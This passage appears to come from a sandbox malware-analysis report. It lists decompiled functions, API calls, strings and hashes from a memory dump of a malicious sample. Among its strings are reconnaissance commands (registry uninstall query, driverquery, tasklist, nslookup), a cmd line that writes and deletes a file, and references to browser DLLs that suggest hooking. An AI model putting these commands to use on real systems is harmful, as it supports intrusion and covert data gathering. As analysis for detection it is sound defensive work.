Part of subcall function 001D4A52: WaitForSingleObject.KERNEL32(000000FF,000000FF,?), ref: 001D4A80
Part of subcall function 001D4A52: CloseHandle.KERNEL32(00000000), ref: 001D4A89
Part of subcall function 001D4A52: CloseHandle.KERNEL32(?,?), ref: 001D4A97
Part of subcall function 001D4A52: RtlEnterCriticalSection.NTDLL(?), ref: 001D4AA3
Part of subcall function 001D4A52: RtlLeaveCriticalSection.NTDLL(?), ref: 001D4ACC
Part of subcall function 001D4A52: CloseHandle.KERNEL32(?), ref: 001D4AE8
Part of subcall function 001D4A52: LocalFree.KERNEL32(?), ref: 001D4AF6
Part of subcall function 001D4A52: RtlDeleteCriticalSection.NTDLL(?), ref: 001D4B00

Strings

-01, xrefs: 001D91EB

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
String ID: -01
API String ID: 1103286547-1095514728
Opcode ID: 507d451f58cd43c02f8ced4e6b5d423a3e4fdf0aa58f0fb77203d07d488fa54a
Instruction ID: 9a7bad9cf85f5696138ca177aef817b0cd6507bae5cb9cf51e76689f50492d3d
Opcode Fuzzy Hash: 507d451f58cd43c02f8ced4e6b5d423a3e4fdf0aa58f0fb77203d07d488fa54a
Instruction Fuzzy Hash: C4F090327817A077D7302BA2AD4EF4E7E5AEB55B61F100425F601AA6E0CBB0C880C6A1

Uniqueness

Uniqueness Score: 100.00%

Function 001D96C0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memorystringUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,001D1B9B,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000), ref: 001D96C5
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001D96DA
wsprintfA.USER32 ref: 001D96EF

Part of subcall function 001C5189: memset.NTDLL ref: 001C519E
Part of subcall function 001C5189: lstrlenW.KERNEL32(00000000,00000000,?), ref: 001C51D9
Part of subcall function 001C5189: wcstombs.NTDLL ref: 001C51E3
Part of subcall function 001C5189: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,0C000000,00000000,?,00000044,?,?), ref: 001C5217
Part of subcall function 001C5189: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 001C5243
Part of subcall function 001C5189: TerminateProcess.KERNEL32(?,000003E5), ref: 001C5259
Part of subcall function 001C5189: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 001C526D
Part of subcall function 001C5189: CloseHandle.KERNEL32(?), ref: 001C52A0
Part of subcall function 001C5189: CloseHandle.KERNEL32(?), ref: 001C52A5

HeapFree.KERNEL32(00000000,00000000), ref: 001D970D

Strings

cmd /U /C "type %s1 > %s & del %s1", xrefs: 001D96E9

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
String ID: cmd /U /C "type %s1 > %s & del %s1"
API String ID: 1624158581-4158521270
Opcode ID: 8812e77875daec5eb755f66bec6a7289ee320ecf3c4c04f43c9132175e803b77
Instruction ID: 6969a1f16230facb1b706ef799a2e3f58784893bf658791f871dbdefcb20ded8
Opcode Fuzzy Hash: 8812e77875daec5eb755f66bec6a7289ee320ecf3c4c04f43c9132175e803b77
Instruction Fuzzy Hash: 12F0A031241A907BD235176AAC4DF5F7A6EDFC2B35F250221F501E96E1DB60888289A4

Uniqueness

Uniqueness Score: 100.00%

Function 001C937C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35memorystringUNIQUE

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,.dll,?,00000000,001C76D1,?,?), ref: 001C938A
lstrlen.KERNEL32(DllRegisterServer), ref: 001C9398
RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001C93AD

Strings

DllRegisterServer, xrefs: 001C9390, 001C9395, 001C93BE
.dll, xrefs: 001C9388

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocateHeap
String ID: .dll$DllRegisterServer
API String ID: 3070124600-294589026
Opcode ID: 52b493994c064669a1f7cd7cd2ff092ad2c515f6f81f9fe4e3043f99a60a8b9b
Instruction ID: 20ded87602201e7eb37f7d408db96dbef99f3ea2cac43697397392df21673bc6
Opcode Fuzzy Hash: 52b493994c064669a1f7cd7cd2ff092ad2c515f6f81f9fe4e3043f99a60a8b9b
Instruction Fuzzy Hash: C1F0B433501690ABC32057E9ACCCD5FB7ECFB557517040126FA05DB661DB30CC9087A5

Uniqueness

Uniqueness Score: 100.00%

Function 001D9897, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31memoryUNIQUE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(CHROME.DLL,?,00000000,001C511C,00000000,77A4F5B0,001C17F8,61636F4C,00000001,?,?,?,00000000), ref: 001D98A4
GetModuleHandleA.KERNEL32(CHROME_CHILD.DLL,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001D98B1

Part of subcall function 001D4DEF: HeapFree.KERNEL32(00000000,?,00000000,NSPR4.DLL,00000000,779F4EE0,?,?,00000000,?,?,?,?,?,001CEF2B,?), ref: 001D4E5C

TlsAlloc.KERNEL32(?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001D98CF

Strings

CHROME_CHILD.DLL, xrefs: 001D98AC
CHROME.DLL, xrefs: 001D989F

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: HandleModule$AllocFreeHeap
String ID: CHROME.DLL$CHROME_CHILD.DLL
API String ID: 2064183339-1223278602
Opcode ID: 2f4818c6ec9d937bae0f92a419df74d82dc02223061d9d3cc2e26fe316faf401
Instruction ID: a93979ada95b6d3944de84f1f690cb47a2aa028b0dd96a522acd4c869826ac1f
Opcode Fuzzy Hash: 2f4818c6ec9d937bae0f92a419df74d82dc02223061d9d3cc2e26fe316faf401
Instruction Fuzzy Hash: 57E02332740EE553C73137AA6C5169D73494FD1F347060137F210AE7E1C7E08C8095A0

Uniqueness

Uniqueness Score: 100.00%

Function 001C57B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryUNIQUE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03E58D20), ref: 001C57B9
Sleep.KERNEL32(0000000A,?,00000000), ref: 001C57C3
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 001C57F1
RtlLeaveCriticalSection.NTDLL(03E58D20), ref: 001C5806

Strings

0123456789ABCDEF, xrefs: 001C57E0

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: 0123456789ABCDEF
API String ID: 58946197-2554083253
Opcode ID: 312a6593e1478d333ba11265dab5716411d871cd71a7b0e241f006b70c810d0c
Instruction ID: 94854134009601d9839ac08f3e383336ff0d209473243cc7eaa1c7f7f12a1562
Opcode Fuzzy Hash: 312a6593e1478d333ba11265dab5716411d871cd71a7b0e241f006b70c810d0c
Instruction Fuzzy Hash: 36F0B274202682DFE708DB95DCD9F1D776AAB24740B548419FA069BAA0CB71ECC0CB21

Uniqueness

Uniqueness Score: 100.00%

Function 001D392E, Relevance: 7.6, APIs: 6, Instructions: 137stringCOMMON

Download Yara Rule

APIs

Part of subcall function 001D7CDA: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,00000000,?,001C678E,?), ref: 001D7CEB
Part of subcall function 001D7CDA: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,001C678E,?), ref: 001D7D08

lstrlenW.KERNEL32(00000000,00000000,77BE06E0,?,00750025,80000001,?), ref: 001D3974
lstrlenW.KERNEL32(00000008,?,00750025,80000001,?), ref: 001D397B
lstrlenW.KERNEL32(?,?,?,00750025,80000001,?), ref: 001D3997
lstrlen.KERNEL32 ref: 001D3A11
lstrlenW.KERNEL32(?), ref: 001D3A1D
wsprintfA.USER32 ref: 001D3A4B

Part of subcall function 001C3F6D: RtlFreeHeap.NTDLL(00000000,?,001C1091,00000000), ref: 001C3F79

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
String ID:
API String ID: 3384896299-0
Opcode ID: f949156aac4a6d3922a640da4d3778998c758c2bc2434e128c83a835852e47bb
Instruction ID: 937a76024523225ddefb210c62b8c69433c836faffab9bb75dc0312b975a62da
Opcode Fuzzy Hash: f949156aac4a6d3922a640da4d3778998c758c2bc2434e128c83a835852e47bb
Instruction Fuzzy Hash: 954130B1900149AFCB02EFE8DC85DAE7BB9FF54344B05446AF924D7222EB31DA109F51

Uniqueness

Uniqueness Score: 0.34%

Function 001CA17E, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 001D4A14: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001D4A20
Part of subcall function 001D4A14: SetLastError.KERNEL32(000000B7,?,001CA192), ref: 001D4A31

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CA1B2
CloseHandle.KERNEL32(00000000), ref: 001CA28A

Part of subcall function 001C9D5C: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C9D76
Part of subcall function 001C9D5C: CreateWaitableTimerA.KERNEL32(001E6114,?,?), ref: 001C9D93
Part of subcall function 001C9D5C: GetLastError.KERNEL32(?,?), ref: 001C9DA4
Part of subcall function 001C9D5C: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 001C9DE4
Part of subcall function 001C9D5C: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 001C9E03
Part of subcall function 001C9D5C: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 001C9E19

GetLastError.KERNEL32 ref: 001CA273
ReleaseMutex.KERNEL32(00000000), ref: 001CA27C

Part of subcall function 001D4A14: CreateMutexA.KERNEL32(001E6114,00000000,?,?,001CA192), ref: 001D4A44

GetLastError.KERNEL32 ref: 001CA297

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
String ID:
API String ID: 1700416623-0
Opcode ID: 43f55b082ad98c4cfe6d439727d56cf1a6021e0884750df036138062fd6212d8
Instruction ID: 4136cf291ae47e056adac6e656f9740be992ab6ddb8da8fab4dbfcae60b8f28b
Opcode Fuzzy Hash: 43f55b082ad98c4cfe6d439727d56cf1a6021e0884750df036138062fd6212d8
Instruction Fuzzy Hash: AE318275A002599BCF119FB4EC84D6E7BFAFFA4358750042AF802DB660DB31C981CB61

Uniqueness

Uniqueness Score: 0.49%

Function 001DF2BC, Relevance: 7.6, APIs: 5, Instructions: 92fileUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C4BF6: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4C02
Part of subcall function 001C4BF6: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 001C4C18
Part of subcall function 001C4BF6: _snwprintf.NTDLL ref: 001C4C3D
Part of subcall function 001C4BF6: CreateFileMappingW.KERNEL32(000000FF,001E6114,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 001C4C59
Part of subcall function 001C4BF6: GetLastError.KERNEL32 ref: 001C4C6B
Part of subcall function 001C4BF6: CloseHandle.KERNEL32(00000000), ref: 001C4CA3

UnmapViewOfFile.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,001CEF2B,?), ref: 001DF2F5
CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001DF2FE
SetEvent.KERNEL32(00000000,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,001CEF2B,?), ref: 001DF373
GetLastError.KERNEL32(001D3736,00000000,00000000,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001DF3A2
CloseHandle.KERNEL32(00000000,001D3736,00000000,00000000,?,00000000,?,?,?,?,?,001CEF2B,?), ref: 001DF3B2

Part of subcall function 001D5F65: lstrlenW.KERNEL32(779F5520,00000000,00000000,779F5520,?,?,001D634D,?), ref: 001D5F71
Part of subcall function 001D5F65: memcpy.NTDLL(00000000,00000002,00000000,00000002,?,?,001D634D,?), ref: 001D5F99
Part of subcall function 001D5F65: memset.NTDLL ref: 001D5FAB

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
String ID:
API String ID: 1106445334-0
Opcode ID: a206487301e76b705b0b3bbbb761a92e89ad3a57896136c094ce18aabb1dd754
Instruction ID: aeb7ec4079291bde114b9cab15f0b34d91140e40d59afb45aea84f4744985fa0
Opcode Fuzzy Hash: a206487301e76b705b0b3bbbb761a92e89ad3a57896136c094ce18aabb1dd754
Instruction Fuzzy Hash: 3231D232A00254ABDB10AFB5DC85BBE77A8FF10320F56007AF956D6290D7709E83DB61

Uniqueness

Uniqueness Score: 100.00%

Function 001C9B0D, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 001C70A6: lstrlen.KERNEL32(?,00000000,?,779F5520,001C9B21,00000000,?,?,779F5520), ref: 001C70B2

RtlEnterCriticalSection.NTDLL(001E6368), ref: 001C9B37
RtlLeaveCriticalSection.NTDLL(001E6368), ref: 001C9B4A
GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C9B5B
RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 001C9BC6
InterlockedIncrement.KERNEL32(001E637C), ref: 001C9BDD

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
String ID:
API String ID: 3915436794-0
Opcode ID: 645876c6814e296a0fcc0c5c20acaf7c78e29cb98df3f706534702ce001f2e08
Instruction ID: fd7733e91202f546a7f830f73dfe7aedcb3ef51baa47a71b5fc6616238a68c6d
Opcode Fuzzy Hash: 645876c6814e296a0fcc0c5c20acaf7c78e29cb98df3f706534702ce001f2e08
Instruction Fuzzy Hash: 22319C32904645AFC720DF58E889F6EB7A9FB64361F04452DF959876A0C730EC91CB91

Uniqueness

Uniqueness Score: 2.04%

Function 001D50C0, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,?,00000080,00000000,00000008,00000000,00000000,?,?,001C1CDE,00000000,?,?), ref: 001D50DE
GetFileSize.KERNEL32(00000000,00000000,?,?,001C1CDE,00000000,?,?,?,00000000,-00000007,001D118C,-00000007,?,00000000), ref: 001D50EE
ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,?,?,001C1CDE,00000000,?,?,?,00000000,-00000007,001D118C), ref: 001D511A
GetLastError.KERNEL32(?,?,001C1CDE,00000000,?,?,?,00000000,-00000007,001D118C,-00000007,?,00000000), ref: 001D513F
CloseHandle.KERNEL32(000000FF,?,?,001C1CDE,00000000,?,?,?,00000000,-00000007,001D118C,-00000007,?,00000000), ref: 001D5150

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: 68f64d7483bf51b9b0b3fa6f6316f6863652745abdac0136ee8c142a49ff37bf
Instruction ID: 7b237a03c1c8289efbe407d88f4e55dcdb46a9e0953dcdbda96731f56c1c603f
Opcode Fuzzy Hash: 68f64d7483bf51b9b0b3fa6f6316f6863652745abdac0136ee8c142a49ff37bf
Instruction Fuzzy Hash: 1911E972500658BFDB205FA8CCC4FAEBB6EEB043A0F15422AF9159B290C7709D81C7A0

Uniqueness

Uniqueness Score: 0.15%

Function 001CA754, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C), ref: 001CA765
StrRChrA.SHLWAPI(?,00000000,0000002F,?,0000002C), ref: 001CA781
StrTrimA.SHLWAPI(?,001E2404,?,00000000,0000002F,?,0000002C), ref: 001CA7A8
StrTrimA.SHLWAPI(00000000,001E2404,?,001E2404,?,00000000,0000002F,?,0000002C), ref: 001CA7AE
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,001E2404,?,00000000,0000002F,?,0000002C), ref: 001CA7E7

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Trim$FreeHeap
String ID:
API String ID: 2132463267-0
Opcode ID: 03052f7b60d286067393beab124fd5968af9ff3e0688877120b7494d23816ed1
Instruction ID: 2508e60f89ea26d4dc45604e662fb95a5588733193290dcc5fa6ee5c92e34b0b
Opcode Fuzzy Hash: 03052f7b60d286067393beab124fd5968af9ff3e0688877120b7494d23816ed1
Instruction Fuzzy Hash: 6211B235B00348BBDB229BA98C84F8E7FBDEF54758F20006AF601A6191DB70CE41DB51

Uniqueness

Uniqueness Score: 2.48%

Function 001D2E6F, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 001D2E9D
GetLastError.KERNEL32 ref: 001D2EC0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D2ED3
GetLastError.KERNEL32 ref: 001D2EDE
HeapFree.KERNEL32(00000000,00000000), ref: 001D2F26

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: bd61c1f2e0a2e33e56afb59885b49f11d3057d28297a86f96b598588d87aa30e
Instruction ID: 7d4d09940dc552b80b35dedb44ad35f84c6d740bcf1ba5be7f68777bf01bd745
Opcode Fuzzy Hash: bd61c1f2e0a2e33e56afb59885b49f11d3057d28297a86f96b598588d87aa30e
Instruction Fuzzy Hash: 58216D30500644AFEB258F90DDC8B5E7BB9EB61318F700919F1229AAE0C775AD84DB10

Uniqueness

Uniqueness Score: 0.99%

Function 001C5D7C, Relevance: 7.6, APIs: 5, Instructions: 66memoryfileUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C9772
Part of subcall function 001C9760: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C978B
Part of subcall function 001C9760: GetCurrentThreadId.KERNEL32 ref: 001C9798
Part of subcall function 001C9760: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97A4
Part of subcall function 001C9760: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,?,?,?,001C12CF,000000D3,?,001CE193,00000000,00000001), ref: 001C97B2
Part of subcall function 001C9760: lstrcpy.KERNEL32(00000000), ref: 001C97D4

StrChrA.SHLWAPI(?,0000002C,?,00003219), ref: 001C5DA8
StrTrimA.SHLWAPI(?,001E2404,?,00003219), ref: 001C5DBE
DeleteFileA.KERNEL32(00000000,00003219), ref: 001C5DFC
HeapFree.KERNEL32(00000000,00000000), ref: 001C5E0B
HeapFree.KERNEL32(00000000,?,00003219), ref: 001C5E1D

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: FileTemp$FreeHeapPathTime$CurrentDeleteNameSystemThreadTrimlstrcpy
String ID:
API String ID: 2468597211-0
Opcode ID: f65755f4c2d8b9bc44ef21681235617374840c234a64723e1263520c52e673c1
Instruction ID: b588daf1fdf86d618a4d5cf9933cd4e5c125dc9bc590b81e797dc779584776cd
Opcode Fuzzy Hash: f65755f4c2d8b9bc44ef21681235617374840c234a64723e1263520c52e673c1
Instruction Fuzzy Hash: D811CA31244B446FE3212BE49C89F3FBA5EDB65714F14041DF6415A693DBA0A8C183A1

Uniqueness

Uniqueness Score: 100.00%

Function 001C3ECE, Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 001C3EE2
memcpy.NTDLL(00000000,?,00000000,00000000,00000000,?,001C332E,00000000,00000000,00000001,?,001C3A10,00000020,00000000,?,00000000), ref: 001C3F0B
RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000), ref: 001C3F33
RegSetValueExA.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,001C332E,00000000,00000000,00000001,?,001C3A10,00000020,00000000), ref: 001C3F53
RegCloseKey.ADVAPI32(00000000,?,001C332E,00000000,00000000,00000001,?,001C3A10,00000020,00000000,?,00000000,?,00000000,00000000), ref: 001C3F5E

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Value$AllocateCloseCreateHeapmemcpy
String ID:
API String ID: 2954810647-0
Opcode ID: 7af2ddf4a992d79031545167b791bb2cf2e90ffad91e7aa9b79f21b055a443a8
Instruction ID: e69809fedb8c7acf86e825c4eca21b1bee7e97d5b7ff73021b52784f972541a4
Opcode Fuzzy Hash: 7af2ddf4a992d79031545167b791bb2cf2e90ffad91e7aa9b79f21b055a443a8
Instruction Fuzzy Hash: 16112032400208BFDF125FA4AC85FAE777EEB24740F008429FE10EA0A0D372CE209662

Uniqueness

Uniqueness Score: 2.20%

Function 001C2968, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2985
memcpy.NTDLL(?,?,00000009), ref: 001C29A7
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C29BF
lstrlenW.KERNEL32(?,00000001,?), ref: 001C29DF
HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 001C2A04

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
String ID:
API String ID: 3065863707-0
Opcode ID: 4ea5148f5ceda4ba3e45b7ad01340d8501b8a28661ff8767f83de408ec0b60a3
Instruction ID: 0b64edb67cd079a3700cc2f5bbe0179ca6b5d0fe7d6bcae2a8ec55e9f8a04a56
Opcode Fuzzy Hash: 4ea5148f5ceda4ba3e45b7ad01340d8501b8a28661ff8767f83de408ec0b60a3
Instruction Fuzzy Hash: A0116376A00248BFCB219BE4DC49F8E7BBDAF58314F048055FA15D6691D774D748CB60

Uniqueness

Uniqueness Score: 0.98%

Function 001C53BF, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000008,001C32C8,00000000,00000000,00000000,00000020,00000000,?,001C3A10,00000020,00000000,?,00000000), ref: 001C53C9

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

lstrcpy.KERNEL32(00000000,00000000), ref: 001C53ED
StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,001C3A10,00000020,00000000,?,00000000,?,00000000,00000000), ref: 001C53F4
lstrcpy.KERNEL32(00000000,4C003436), ref: 001C543C
lstrcat.KERNEL32(00000000,?), ref: 001C544B

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrcatlstrlen
String ID:
API String ID: 2616531654-0
Opcode ID: d27331d73d31984790f6dcd4f1bb0452e7091675de6a6d48d63844e43649446d
Instruction ID: 6710962d163ad455705c59fd9a1bfd0b0a98c5fad8cafb32aca43aea762314a3
Opcode Fuzzy Hash: d27331d73d31984790f6dcd4f1bb0452e7091675de6a6d48d63844e43649446d
Instruction Fuzzy Hash: 6411CE722006469BD7248BA5ACC8F2FBBEDAB90742F44002DF605C7540EB30E8C5C721

Uniqueness

Uniqueness Score: 1.97%

Function 001C2AD8, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001C70A6: lstrlen.KERNEL32(?,00000000,?,779F5520,001C9B21,00000000,?,?,779F5520), ref: 001C70B2

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C2B01
memcpy.NTDLL(00000000,?,?), ref: 001C2B14
RtlEnterCriticalSection.NTDLL(001E6368), ref: 001C2B25
RtlLeaveCriticalSection.NTDLL(001E6368), ref: 001C2B3A
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 001C2B72

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
String ID:
API String ID: 2349942465-0
Opcode ID: 2c494b2ded97bb799c517d97efee16c156a34324e57edccf4527a44c37f7d897
Instruction ID: f71864527a02870816c6e1c85428c5644f4b055516614599dae4abfed563886f
Opcode Fuzzy Hash: 2c494b2ded97bb799c517d97efee16c156a34324e57edccf4527a44c37f7d897
Instruction Fuzzy Hash: 34112136101390AFC3209F64EC85E2EBBADFBA6321701003EF416A76A0CB319C41CBB1

Uniqueness

Uniqueness Score: 2.20%

Function 001D596C, Relevance: 7.6, APIs: 5, Instructions: 56UNIQUE

Download Yara Rule

APIs

ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,001D1D3E,00000000,?,00000008,001DAA9A,?,00000000,00000008), ref: 001D59AB
ResetEvent.KERNEL32(?,?,001D1D3E,00000000,?,00000008,001DAA9A,?,00000000,00000008,00000008,00000000), ref: 001D59B0
GetLastError.KERNEL32(001D1D3E,00000000,?,00000008,001DAA9A,?,00000000,00000008,00000008,00000000), ref: 001D59CB
GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,001D1D3E,00000000,?,00000008,001DAA9A,?,00000000,00000008,00000008,00000000), ref: 001D59FA

Part of subcall function 001DE46B: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,001D5985,00000000,00000000,00000004,00000000,?,001D1D3E,00000000,?,00000008), ref: 001DE477
